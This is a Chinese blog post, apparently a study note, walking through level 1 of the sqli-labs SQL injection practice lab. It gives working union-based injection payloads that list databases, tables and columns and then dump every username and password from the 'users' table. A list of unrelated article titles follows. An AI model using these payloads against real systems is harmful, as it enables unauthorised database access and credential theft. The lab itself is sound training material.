先看了一遍关于sql的一些知识点，通关sqli-labs加深下印象。之前也因为作业的原因通关过前10关，但那时候不懂得原理，跟着网上的教程做的，所以这次尝试自己思考通关。

less1

尝试and1=2，不为数值注入

加单引号报错，判断为单引号字符注入

判断表有几行数据，order by 4–+时报错

用union联合查询有无显示位

查询数据库名

?id=0' union select 1,(select group_concat(schema_name) from information_schema.schemata),3 --+

查询表名

?id=0' union select 1,(select group_concat(schema_name) from information_schema.schemata),(select group_concat(table_name) from information_schema.tables where table_schema='security')--+

查询user的列名

?id=1' AND 1=2 union (select group_concat(column_name) from information_schema.columns where table_name='users'--+

查询用户名跟密码

?id=-1' union select 1,(select group_concat(username) from users),(select group_concat(password) from users)--+

最新文章

1. FastSocket学习笔记~再说客户端与服务端的组成
2. linux 硬盘速度测试
3. 【bzoj1588】 HNOI2002—营业额统计
4. VS2012使用NUGet自动下载(还原)项目中使用的包
5. 安装 SQL server 2008 R2
6. php session详解
7. Linux下设置网卡随系统启动
8. linq join多字段
9. GDI学习之俄罗斯方块续
10. 利用 Composer 完善自己的 PHP 框架（一）——视图装载
11. 记第一次web前端校招笔试
12. JavaScript API
13. hello spring春天来了
14. spring项目启动时执行任务
15. 【BZOJ1497】【NOI2006】最大获利
16. Android源码目录结构详解
17. java.lang.ArrayStoreException: sun.reflect.annotation.TypeNotPresentExceptionProxy
18. VS生成Map文件
19. JQueryEasyUI easyui-combobox 单击文本区域显示下拉菜单
20. tomcat + jdk 快速部署

热门文章

1. Next.js SSR Tutorials
2. docker-compose All In One
3. ES-Next @Decorator All In One
4. components & slot
5. WebAssembly JavaScript APIs
6. 为什么说NGK引领全球数字资产财富革命
7. 为什么 Python 的 f-string 可以连接字符串与数字？
8. Python算法_两数之和（01）
9. Matplotlib 图表绘制工具学习笔记
10. 微信小程序：列表渲染